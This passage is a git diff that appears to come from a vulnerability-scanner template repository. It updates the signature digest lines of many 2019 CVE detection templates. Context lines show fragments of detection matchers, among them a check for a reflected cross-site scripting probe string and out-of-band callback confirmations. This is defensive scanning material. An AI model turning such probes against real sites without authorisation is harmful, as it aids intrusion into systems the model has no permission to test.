+62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aeaa962172b82b074970d26c4c6f81a7bb719a6aaccbb9a852c19b747476b76402207536e498996d527db3a3ec6d350695c8e06664bd7928fc8d78bb4c0d9cb7698d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038177b6073964e42910b5c3cc153d830954c2898553dd4fbd0ec9472de5d2ba8022050fec2b9136e7ab288d115ea5735902f150f90f23a0ee0ba1c3fd1d4601c31d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 5e97e6b2fdd..4b4a2c3db55 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009112d417343ee54342e9f00894eb170896010d37e7992a6b4034900fa5bdedf20220206bcddf9c964c801daa554077c71ce9eac4fc8ee5d69b1caa76182196253c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a86a05242d73737f3d80d24607f131f35e9ba3bca93bec15ea63827ff5807ab80220199418d6895cf7564743a44cc3ba4cc51c250a16524bc38d0028fca055a3f44f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index b1dd74ad62b..b136adb14dd 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220750a46f78c58e2b403c25202e662e8c65aa0cd45a9713cf3bf5a8251048b27a802204094a9764041efbc3acbd5cc4ff690f3be2d445583bdedad1d1fdc80d232b1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201183df38a9b064a155d317b5253c7214b816c614f19ab4ef488d76a0b6f9b9ff022011203443f1b66523a8681b35c7fb76e1a6cafec117959a7bdf92426ba405d4ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 562352af770..15857f8a9ae 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c837d137f9242deefffedd59ce232c6577d5a15f9e9e7a51c63b53b62a779d202205f8f3e8dd1441696bae3da945247853bdbed95abc9f6ad4fe84ddbbe270137da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023a9097b414bb4691697d5590fa7d17d24d0918971ebe5782bf18ccbef411e7202201e4b3b7ce1166416a233d5d5f6fb6e06a42e580398250cdb89d6be0d2ef56b42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 9982f6ea17c..c5757047d8e 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eadcf4f9e1ad1561b419291c5f761caf61f31fc8259ac6427be292a379811cd5022062e4f54826dba0f6c576831f63c4ab61045d4815bf6fade3e6d9a075df92ba6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068f6b31753e2ea320c138705b39075e5d01b7d1f7b4d4221002cca86dfaaedbc02200d7d202a8a8e16ce1e7cbb10f1f74c1079606b15c0c36b7d61eb80664cb6bff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 6bf8e652066..fa0f6f57eb4 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c6e237fc423efa7472f0573f3b7a8e88e398ec84d8c64b5586d5245a2d75018022100e0d2ad48e2faf2e2acd2be76942cca51b4be8a312b90ac56e0c1fad2602451f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cee0959f3f698012eff86b7420071f0191c3d1b7fcdf341364d62b37ba785a10022027631e37d8e2abb15c1003fd72e9cc39051c817fedf96936762c3bbb5d29e8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 84f2aec610a..1f971fe2a23 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd5ae8f9f4e423acb34b1c4cad442933015d038c7c1d089e0f0c55cd3fb511cc022100d966b595bbeba127bd3b018df72653c6aad4d42c9e3728ff4697f274bba189cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022071687d0109dd04039a309187d3c5515f446ec4dd74e39392b6007449e379be6e0220609e74afcff1953f3a939002cab08beea35a53131789ce9c771ea5af5f7e0f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17228.yaml b/http/cves/2019/CVE-2019-17228.yaml index f05643a3a27..8e1717beb83 100644 --- a/http/cves/2019/CVE-2019-17228.yaml +++ b/http/cves/2019/CVE-2019-17228.yaml @@ -74,4 +74,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f5568fdba8800d6b48249437c08b63764ff3e5fb73df23426892c7e286729430221009e293d248a62cc2acce69f51384a4f4a7618d90277b1498354e8c0f4b2c23817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008864dde097ad7fb69902b9ef7d8e1728224a480516f58f6078a22987e3abdea1022047bae77e0f5ad1d0a5431b8cc6eb07316cb889af66b2d4088c8f8f6f1e688b19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17230.yaml b/http/cves/2019/CVE-2019-17230.yaml index 925e87af603..16ea00efe41 100644 --- a/http/cves/2019/CVE-2019-17230.yaml +++ b/http/cves/2019/CVE-2019-17230.yaml @@ -65,4 +65,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "<div class=\"page-content\">","{{page}}")' condition: and -# digest: 4a0a00473045022100c679f8450d70fe8dbf2c2822cd0fe80a882ff8f897fdaa5ffd643f9b6a6c5a25022026fa48bf2f333c3b85b0360981b58cc216df97079deb36db62d93a1fa17777f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220407da0fe48c3e4fa8878edac1362016209d19b902fbbc176c8eeafc390a77b87022100d2e262c15c66c5d220af50a1b9f6ba2ca4753f80b4e36ef64f50d224225a3eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17231.yaml b/http/cves/2019/CVE-2019-17231.yaml index bec2b19e14a..65f99d9eed4 100644 --- a/http/cves/2019/CVE-2019-17231.yaml +++ b/http/cves/2019/CVE-2019-17231.yaml @@ -65,4 +65,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "<script>console.log({{string}})</script>","top-bar-info")' condition: and -# digest: 4a0a00473045022059ec5ba8b998f81375adf2021e67417f8cea32e33e656b7ab1302dd9ad0122b8022100c219a68a6d65a7504c74c01bba1c860e7933225415e0b461be2cb3070260fc12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3a182e3325aa085b9dc3217e1a951c4845b9ffb50b1477f57edb46bf2fd8951022100866a32f89a8867e72dbf6268f98353e30abaa492a5e3df63ee0c533324f3738f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17232.yaml b/http/cves/2019/CVE-2019-17232.yaml index 79233460f97..99750062a81 100644 --- a/http/cves/2019/CVE-2019-17232.yaml +++ b/http/cves/2019/CVE-2019-17232.yaml @@ -83,4 +83,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2a343e982a9c48b6dadadd7de12d49c54f2175e8b29030db5ed8e93f9e3beb4022100a485da32f97256aef93fc1ab0ef55b0fdfef4b7325563f63554f7b3f1e145d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207286b883d57b4aba7b188d33901dc8235f39a59e1c53de2114288fb5284cea37022100e4982c83bf9d0ae56fb4dee25b4fa03752e302409b40e2494ce7b829883896df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17233.yaml b/http/cves/2019/CVE-2019-17233.yaml index 96fd3cd4c65..ee8b6ea348c 100644 --- a/http/cves/2019/CVE-2019-17233.yaml +++ b/http/cves/2019/CVE-2019-17233.yaml @@ -75,4 +75,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0e17088bbfe78acea1e76455fa10bafb431ee20afabefd445692e696fd9b82102204fc2058361b2adb1562ff3414cba1ffcfb9f2eab0324492e88784d1fabed3ecb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042becfa1c2b12589f3592f24e9f0350299edd1cec47a8504619f346d2dfdfa12022004f1270539c3bd373883bc5448bcf4d7f98b81707192ee8bc79ae34fd9d4a297:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index f476a968b4f..e5e6da4a627 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -81,4 +81,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203184c69ad3aa7387fcd403215bcba085df46b72e5d89d2c6fa8c2e9570ef5c73022078fc06ba7bd04f361a7e9a3040390a7cf4f93b9e29d55aa3e6d444403aafc192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086a84e223fa827d03e30e0cd47217642f20f9a7b6cac6363d1ae18022238c27b02205dc1d7d669f034e18490526b436f3f167be92736b29b8486544e18cd7e7ab8bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index 78a89eed567..5c4234cbde4 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207621bea4290a5c3aebf68022ce3b0dae4d50eded40dbb5686d8173d405c4b334022068eab36bbac0d6826b67925e8f565545079313577fb745014f9896d7adebe3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100930bd4426901ec3d96b37405c656f1fabd1c95a1064b655fb373651cc71de2b3022100daaa4505e66b0afaa26b418940dd2a1f5b3537dc96f9b0f824794b4df439c51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index fd290d5d13e..eec8c93296c 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3acb6634f21b711dbaa856068977d303cc9e07363063783368323cf976b9884022008e03d19f4689b367a1585fe9f26523eaa4a8780c0a45523d391c13d5dcda8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202eacf2a3d3b4792f1578b7a1984357a419393e0aafa66d81c635df52abdb4c4f022054975567ba73b702e86123d2c1468b98ce222fcaeb9dbe69452684d77c44d76f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index d308a52576e..d4653d6c800 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -82,4 +82,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 490a0046304402201ebe75b86651b38a2c60c04e57eac0f3e8912ae4de7b9d5a07569fdc836dd4df022006028360c5368580dec9c28b93ba36da645d3ef63a1ed91291525b5ebb2f4b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099da493dafc4b735c3162f263ffa2e2cd7baed90783dd21cbe7956c6ebdf174402210098182cad5b092d3a3d3e5a4192c1b63185a11f82ed912715cedcdb696efb337f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17564.yaml b/http/cves/2019/CVE-2019-17564.yaml index dd3718666dd..b7d354be393 100644 --- a/http/cves/2019/CVE-2019-17564.yaml +++ b/http/cves/2019/CVE-2019-17564.yaml @@ -68,4 +68,4 @@ http: regex: - "java\\.lang\\..*Exception" - "java\\.io\\..*Exception" -# digest: 4b0a00483046022100f52c74fbf71eb7ba47ed1ab9bcb9fb9525a126de782d13c7cad72459a95a9a2e022100889ad942ba6322e67ff91d1c3f0c8753cf1c083d4236269ff6a545a7b72d1f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b9d9020a6d51a57d5e254133db44f7f148adc4458215eecde695e46d02580d6022100e1cb55e27fa79d8441af5fcd5a9b6fefc5f6c97e936f27e2a35859e82164cf31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index add5ab5f1c8..f9b78eb94ca 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100824030947f832ded4f58730cfed4657ce423d602404bde7dd51ba9ef7439c25f02205b51bdbea3c8455e4aaaa28f74c7d67a6820b8b87145e8b18a0eb328cd19c0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068d7bff49083804e64e1b27580aad4a2a8873750af03121775d4ac0edf5ab033022100b67756bc8c1f68a044a39f4f861149b5340b01a373adbbda14d64b0c3c65d4d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 9d05e55a954..eb339985b5c 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022023995d26773a97b840b039c74627bddcf8ae22ab76ee2e7d0d6397c0703978f0022100e04e338e96c0547333cf8f30de2b0794d53002cae3dd1d53a35add6e75dfce77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c86c766ad82c913384f6875192bfefb734469fdb77dbeb2963ea41491aab8b46022100ce13e361cb67c4ddc8aaa399423164f2a6a720736b615690a7cce2812cc255ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 64a1f515ce0..c2f3350487d 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100c22fdec7a8aae3054dd40d8f8c8e9c746bc34804538028da239e80b38381c9a50220482958a0f8ea11853143c450017ef38e0cae77929090fa47683f06f3c26bba6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b496a20c1e95a3cacb0e6332abf290cfa53acb8b26c2605f1f01e6ad9366f54022022d3295af8ea4d3e8098684051285694403b67c2a17c99ad66a4a5fe0f87764b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19822.yaml b/http/cves/2019/CVE-2019-19822.yaml index f8ea343e4c2..f0205341028 100644 --- a/http/cves/2019/CVE-2019-19822.yaml +++ b/http/cves/2019/CVE-2019-19822.yaml @@ -40,4 +40,4 @@ http: - 'contains(accept_ranges, "bytes")' - 'status_code == 200' condition: and -# digest: 4a0a004730450221009c3fdeef0d83773df84421ec151ec0155d9226af413584c8cf300f3fce6a2d00022029ea469ac85c355d8b9ed56a15f19df8d7ca2c3effa10a5b76913764e740f180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210094a2b3f9bb742aa5456c425c4cabd7ae64027ec4212e6b469f384d4a07e38edc022047dac8ccfb31ec45e3e617dc05de115d4f87da2078bedbd5b79ffa06f27ab2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19825.yaml b/http/cves/2019/CVE-2019-19825.yaml index 0d0641046a9..1cc3a5b761b 100644 --- a/http/cves/2019/CVE-2019-19825.yaml +++ b/http/cves/2019/CVE-2019-19825.yaml @@ -46,4 +46,4 @@ http: - 'content_length == 4' - 'status_code == 200' condition: and -# digest: 490a004630440220126b1f71c6ad7667d7688d732eca068522559e5739dd370251e5efac957a967402205d7256411b6965205438b3c1e72da582dc9c0d035ade86adbdddc74f7991f3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef5e41f3ed764caf360ba3ec860f7044ef7f8404aeba2aa933c804b88382fdef022100bcae15b8fbcb93c9b4856450a9e3451124eafe4bfcf68be504118d8d40bac6bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 6327d25f694..3109a02d0b0 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063df8f9b4cae0b86d503fef93fcac314c8927f690083b4c0ada511b157920f4102203452adf80d615742810c4d172cd71a3494248d195d4777ab575bbab5af8bb71e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206113ffa0fcbc9aa78722d2061c33a5179c041642cb40cd4dbfbb6ca7a32442d7022100eed4b5f469bac26e24bffd5d9f1d3f8ef053be449f63f3be34fc1c18bd627742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index 1646f15570d..ad192b5c02d 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b991915d6da4d7e37baa908f23ab3896b6d65f10787818981ecc968b22b2861002205caa32197bb821f2aacf23f5c0592dcc662c26d5a96f3e5d9144133c7a0f2f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026896033743d95297bb8fed4e00813cffa71bffaefef3738b5768fc581ebab77022100b41ba0e1d97a0f6eee06e83eed8c81cebf8e43c51ec81ab8538ebbd04f548b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 2faaf2c621c..63578b104fa 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -47,4 +47,4 @@ http: part: header words: - "text/html" -# digest: 490a0046304402204871f267a509ce5d88d1ec41e333264c32acc3382ac83437d73efadfedb3e96b0220772836697ea05dfc9b53709252ad77b26544b68e91cbdc0e94f1ba8832717695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe960d255b86d684b964f1d5552874beeb2dea99ecbc32e0c8c3445ab338b30a02205df35c211265288ca335a1c8ae3b84a109550870f176e0c19a5aae5639e1727c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 2f848f9916a..73677561d98 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -65,4 +65,4 @@ http: - '(?:[a-zA-Z0-9+\/])*_poc.php' internal: true part: body -# digest: 490a00463044022062e1e73cc8bc6774bf3e2333495cc3ce7b3c4ce2c8e9f9156b432b620a9b60f4022022b1ce22590370a07e3968e31ffe1dfc74993489bb9e5ae073f10330fb7381d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f4b6cca5ec5ec658c51230c4f3ea7debec85054ff09bf67891e1352e99a4af460220055bf459ed093b9af787c180ee946839c0bd0b474cfb85ba369a4ad8db1942b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 730d4ae546d..56a1e44bd7b 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ae7065a0960c05290747a4466add67891106a658bc500203abb95b300097a52022100ca220f6fa3bc40551a1fdffd68eba5e540b712c0c79bb0640f1957c899d8a672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f2c5e585c86b780c2c01c21a218f4bea90406835b64605c8e2e878dd4720284022100c5b22e595956e6aaf996944f9255334bf0d00364135764ff1b8246b9e0d0785e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-20504.yaml b/http/cves/2019/CVE-2019-20504.yaml index 5ef966c47b2..60a7bdac379 100644 --- a/http/cves/2019/CVE-2019-20504.yaml +++ b/http/cves/2019/CVE-2019-20504.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" -# digest: 4a0a004730450221008390e3cac330526da53e87bf32d26c99047483e5ce08daacf7c62f5ff60385700220153278c008da84cf12270e1d1bf3b2d2b0e429d792ca52f09707482458818b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbb4051666793e32692ade5d3dbb94714e26d1022d1d7c94bd37364ab5b99b84022030daabaeb7983b38a5aaf68e374bfc8b4b00d382d50af2f0ae0ca729467305a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-25141.yaml b/http/cves/2019/CVE-2019-25141.yaml index 2508460c58a..9ad687e6c07 100644 --- a/http/cves/2019/CVE-2019-25141.yaml +++ b/http/cves/2019/CVE-2019-25141.yaml @@ -64,4 +64,4 @@ http: - 'status_code == 302' - 'contains(location, "options-general.php?page=swpsmtp_settings")' condition: and -# digest: 490a00463044022035cd27faa2117d743e2fd08dc1c0e30449ec226bc7564efcbdff4a64143f53cc0220364ef68810cabb91b57099f2f29a0412098c75640377cb671f814369bb0b6375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200fb8d251ca33f37eddd37cc70c16bf4dfdfa5ebe3369066c63d8faa91d18a1ef022100e6fecb9d57b930663d678a4218c82bc89e6802f3e6d05f016c5ea0cfd7fda9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-25152.yaml b/http/cves/2019/CVE-2019-25152.yaml index 79ff4a8027d..40f811ac84c 100644 --- a/http/cves/2019/CVE-2019-25152.yaml +++ b/http/cves/2019/CVE-2019-25152.yaml @@ -53,4 +53,4 @@ http: regex: - "(?mi)Stable tag: ([0-9.]+)" internal: true -# digest: 4a0a0047304502204591d5a60f74dc37136039cc48aff839341d8ac759a31aa19afa6b90967b57d4022100daf14cc75977a4e1d60a325d8c7dce845d5de38918e1c751ec6514e1d4769520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cd2b3c1f63fbde91e106d995be3a44f10038319486bd8210f07dec42e5354f502205d1aa304ac1f3b5cf2873e341461a0bf31f6e82aa2f60d741dc97e403f817b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index c8ae7f7d61a..b847d5f9a76 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -43,4 +43,4 @@ http: part: body regex: - '<script[\d\D]*<throwexception/>' -# digest: 4a0a00473045022100f9c76126307f9290f3377862120c927cfce521e8626e235224a7891dd6acb6a702207b94396c6131ffaa10adfac924321e477a91803eb3c915c94e9bcd66ac97ffac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a02f3959fff8e60bfd08ce586200b358ec13ee785726f85b8c5285ebcc417c2102204547234d77460729b36e9c26fb4ff09fefb8fc316555d3241ba616c4f31e73da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 208b28467ff..1a60398690b 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100efc743c847f305ac31d0e499752853f508ba693fbe367349559054a027dab1bf022100bb8550e20c3a57ff04af3a5a78e7921d0cb0ecb9c9e72cdb7a2b63d1cb853c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db10b60f92707cbae430c901cd3089b4d816372346aed6d1039e790517ecc4ec0221008c07347a09a625d833c2e57ba3c1a75e94307d70332bbad3fd1cb5fd270f4803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index a5de9a97373..6e6a612ae56 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5d81e3003b287ec61b39ad4158c0a1972fb18bb5f907481553a83f67e4863ea022100d1b56e3b74eca9f1daaecc6c6913062556b5ff357b12c9521476c9cc629029ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200578fdc009557a27d0b7dabbed09e565790e0f382a9a90e51aea53f2ab67096502207c5ac2f2dff4ed137bc1567cbeadc96b4e2ef52e73610c013b0b96ff37b09c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 19c22548d26..de7275b4904 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221009697b1e1395b06e4d9efc2a7829a198e140209886717ef0799b9504b0612e3d102201e1abcad4342cb31634f7bc1a5d7f643d5bbfbc6f54ae4b1a33af06637633c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008710168d1eeba4e95553c39d88fd6b36e4ad8c22d91fcf42d651cd779a86fbd8022100c7f6e852db517d115ac5d4793fc07ec0b13b5324b82c7f91c4568a5154b879d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index ef47cbf8553..4960b20bf24 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f5c3a89fad71d1130d5fffc426c42b44f200ad6a02f19abac25b7ef6db715a3402203ef2bb353b461739c56dc8b19c3eef6144d9a785ae0c7b4873629b221d8b143f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d05236b08e8a4a124e9328c6d3db82244818dd95edea80ea841478fc1b88378d022056c0a5e95ea4e108bde7fe6adb88fb469c0e36d7ca557165cc982275c32ba107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index e346853d944..b07f95b27c0 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -49,4 +49,4 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4b0a00483046022100fb669e7ecf422888452b0f82a59112e8b52e47e0b2da66b5e830e602a3aa475b022100806ba595a8f17cfcb99aae48a8a231c51a410d2a70777e576d497a340df97899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea03e6bdaf6b0cde53235a18a00f7e90356e6b23eba8accfe7fc4b8482a6060b022100d2f16a1d6fd44c732b6b46d94c90639d31f93014d840fb444f6fcb7fbe34ae7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 52012e56f62..739282b37da 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -56,4 